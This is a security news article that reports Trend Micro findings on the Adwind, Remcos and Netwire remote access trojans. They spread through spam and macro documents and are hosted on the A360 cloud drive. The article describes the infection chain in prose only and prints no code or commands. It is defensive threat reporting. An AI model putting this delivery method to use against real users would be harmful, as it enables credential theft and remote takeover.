Wednesday, April 30, 2025
HomeTorjan Horses/wormsBeware !! Dangerous RAT's Called "Adwind, Remcos, Netwire" Delivering via ...

Beware !! Dangerous RAT’s Called “Adwind, Remcos, Netwire” Delivering via A360 Cloud Drive

Published on

SIEM as a Service

Follow Us on Google News

Widely Used A360 Cloud Drive Platform Abuse for Delivering Adwind, Remcos, Netwire  Remote Access Trojans and used as a Malware Distributing Platform by using File sharing site to host Malware.

Nowadays  Many Cloud Platform used as a Malware Delivering Platform that by hosting Malicious Files and also being served as a (C&C) infrastructure.

In this case, Command & Control Server Resolved by Free DNS services and it helps to RATs/backdoors that would phone back to their respective command-and-control servers after the Malicious RAT File were Downloaded and Executed.

“A360 is a cloud-based workspace that centralizes, connects and organizes your team and project information across your desktop, the web, and mobile devices.”A360 Drive provides online storage for collaboration. Anyone can create an account for free and given 5GB of space.
- Advertisement - Google News

According to Trend Micro Report, U.S., South Africa, France, Italy, Germany, Hong Kong, and U.K. the most affected By this Distributed Adwind, Remcos, Netwire RAT’s.

Also Read:  Free Remote Access Trojan builder “Cobian RAT” Distributed a Backdoor

How Does These RAT’s Abusing the Cloud Infrastructure

These 3 RAT’s Initially Spreading via the Spam Email Campaign with Different Malware Variant Functions.

Adwind RAT  Intially Discovered from as a JAR file (JAVA_ADWIND.JEJPDY) which connect to the C&C Server when the Script get executed. later it will retrieve and exfiltrate multifarious data including credentials, keystrokes, and multimedia files.

RAT

NETWIRE RAT Identified through Spam Email Campign with attached  (JAVA_KRYPTIK.NPP) file containing a Java ARchive (JAR) along with Exicutable Script and futher analysis confrms that, it has string references NETWIRE remote access tool with keylogging and SOCKS proxy capabilities.

Trend Micro Discovered a Document File that Discovered as “AMMO REQUEST MOD Turkey.doc” (W2KM_DROPPR.XWD) that contains a generic template for macro malware used to abuse the A360 Drive .

Macro File is Encrypted and also Obfusticated Exicutable that will be finally Decrypted.it contains a payloadthat is a malicious PowerShell script that will download a file from A360 Drive and execute it.

The downloaded payload is a Visual Basic obfuscated executable file. Deobfuscating it reveals the Trojanized Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. Trend Micro said.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Researchers Uncover SuperShell Payloads and Various Tools in Hacker’s Open Directories

Cybersecurity researchers at Hunt have uncovered a server hosting advanced malicious tools, including SuperShell...

Cyber Espionage Campaign Targets Uyghur Exiles with Trojanized Language Software

A sophisticated cyberattack targeted senior members of the World Uyghur Congress (WUC), the largest...

Konni APT Deploys Multi-Stage Malware in Targeted Organizational Attacks

A sophisticated multi-stage malware campaign, potentially orchestrated by the North Korean Konni Advanced Persistent...

Outlaw Cybergang Launches Global Attacks on Linux Environments with New Malware

The Outlaw cybergang, also known as “Dota,” has intensified its global assault on Linux...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

MnuBot – New Banking Trojan Take Browsers Screenshots, Keylogging to Steal Bank Data

Newly discovered banking Trojan named MnuBot malware spreading to steal the sensitive bank related...

New Banking Trojan IcedID Evade Sandboxes and Performing Web Injection Attacks

A New Banking Trojan dubbed IcedID discovered that capable of performing some dangerous web-based...

Silence Trojan Targeting Financial Institutions Recording day to day activity on Bank Employees’ PCs

Security experts from Kaspersky lab discovered a new trojan dubbed Silence trojan that targeting Financial...